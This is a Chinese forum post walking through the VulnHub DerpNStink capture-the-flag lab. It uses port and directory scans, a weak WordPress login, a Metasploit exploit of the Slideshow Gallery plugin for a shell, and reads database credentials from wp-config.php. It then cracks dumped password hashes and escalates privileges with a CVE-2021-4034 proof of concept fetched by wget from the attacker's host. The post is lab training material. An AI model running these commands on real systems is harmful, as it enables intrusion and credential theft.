首页
找靠谱产品
找解决方案
找靠谱公司
找案例
找对的人
专家智库
悬赏任务
SAAS
ToB门户
了解全球最新的ToB事件
论坛
潜水/灌水快乐,沉淀知识,认识更多同行。
ToB圈子
加入IT圈,遇到更多同好之人。
微博
Follow
记录
Doing
博客
Blog
文库
业界最专业的IT文库,上传资料也可以赚钱
下载
分享
Share
排行榜
Ranklist
相册
Album
应用中心
qidao123.com技术社区-IT企服评测·应用市场
»
论坛
›
安全
›
数据安全
›
【vulnhub】DerpNStink靶机
返回列表
发新帖
【vulnhub】DerpNStink靶机
[复制链接]
发表于 2024-9-2 23:04:48
|
显示全部楼层
|
阅读模式
马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。
您需要
登录
才可以下载或查看,没有账号?
立即注册
×
靶机安装
下载所在:D
erp
NStink: 1 ~ VulnHub
信息网络
靶机IP扫描
nmap 192.168.93.0/24
复制
代码
端口扫描,开放21、22、80端口
nmap -A 192.168.93.158 -p-
复制
代码
目录扫描
dirsearch -u http://192.168.93.158
复制
代码
进行网址访问,页面上只有个单词DeRPnStiNK,先记下来
点击检查,发现第一个flag
又发现存在一个文件/webnotes/info.txt进行访问
翻译一下
是需要更新当地DNS主机文件,思考应该是需要我们把IP和对应的域名进行添加到hosts文件中,但不知道域名是什么
后面拼接扫描出来的目录/php/phpmyadmin/看起来应该是一个可以登录到
数据库
里面的
拼接/robots.txt
继承访问
我们重新用另一下令进行目录扫描一下,会出现许多上面没有扫出来的目录,
dirb http://192.168.93.158
复制代码
weblog目录下存在登录页面,测试一下
发现进行了域名跳转到:https://d
erp
nstink.local/weblog/,并且页面加载失败
因此大概前面的DNS更新应该是192.168.93.158与d
erp
nstink.local/weblog/的对应关系添加
通过目录扫描出来的,还有目录//weblog/wp-admin/
尝试弱口令登录,成功 admin/admin
毛病利用
这个框架是WordPress,进行工具使用 wpscan 扫描,扫描到许多插件存在毛病
wpscan --url http://derpnstink.local/weblog
复制代码
使用Slideshow Gallery 存在的毛病
因为我们知道后台的账户密码,以是我们用msf来进行getshell操作
开启msf情况
msfconsole
search slideshow
use 1
show option
set rhosts 192.168.93.158
set targeturi /weblog/ #设置目标的url目录地址
set wp_user admin
set wp_password admin
run
复制代码
先将获取到的shell变化为交互式的shell
shell
python -c 'import pty; pty.spawn("/bin/bash")' # 获得交互式命令行
复制代码
翻看
配置
文件,发现了目标
数据库
的账号和密码
cd /var/www/html/weblog
ls
cat wp-config.php
root:mysql
复制代码
是
数据库
的账号和密码,回到页面进行登录,登录成功
访问 wp_posts 表发现 flag2.txt
在 wp_users 表发现两个账户密码
unclestinky:$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41
admin:$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/
复制代码
破解之后是wedgie57
在靶机home目录下发现两个用户,mrderp/stinky
尝试切换到stinky用户,密码使用刚刚破解得到的wedgie57
成功切换到stinky用户,进入到stinky目录并查看当前目录的全部文件
在Desktop目录发现了flag3
提权
观察到ubuntu
版本
是14.04,大概存在一个毛病。
我刚开始用的是kali上面的searchsploit工具下令进行搜刮
版本
利用搜刮出来的脚本文件,但失败了,也大概是利用的脚本不对,各人可以多尝试几个脚本,看看能否成功,也希望与各人讨论
我在这找了一个有关
版本
的干系提权文件,有一个当地提权毛病CVE-2021-4034, 作用有点雷同于sudo,允许用户以另一个用户身份实行下令
#这个提权漏洞利用脚本下载地址
https://github.com/arthepsy/CVE-2021-4034
复制代码
将这个文件下载下来,复制到kali里面,并挂到服务上面
在反弹的交互式shell中,必须要进入tmp目录,否则无法下载
从kali的web端wget下来cve-2021-4034-poc.c,将其gcc编译输出。然后复权运行,即可提权成功。
#下载命令
wget http://192.168.93.130:8000/cve-2021-4034-poc.c
#下载完成之后,权限修改
chmod +x cve-2021-4034-poc.c
#编译脚本
gcc -pthread cve-2021-4034-poc.c -o cve-2021-4034-poc -lcrypt
复制代码
进行这个脚本运行,提权成功
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
继续阅读请点击广告
回复
使用道具
举报
返回列表
浏览过的版块
终端安全
云原生
SAP
移动端开发
网络安全
信创/国产替代
区块链
Mysql
MES
Oracle
西河刘卡车医
+ 我要发帖
×
登录参与点评抽奖,加入IT实名职场社区
去登录
微信订阅号
微信服务号
微信客服(加群)
H5
小程序
快速回复
返回顶部
返回列表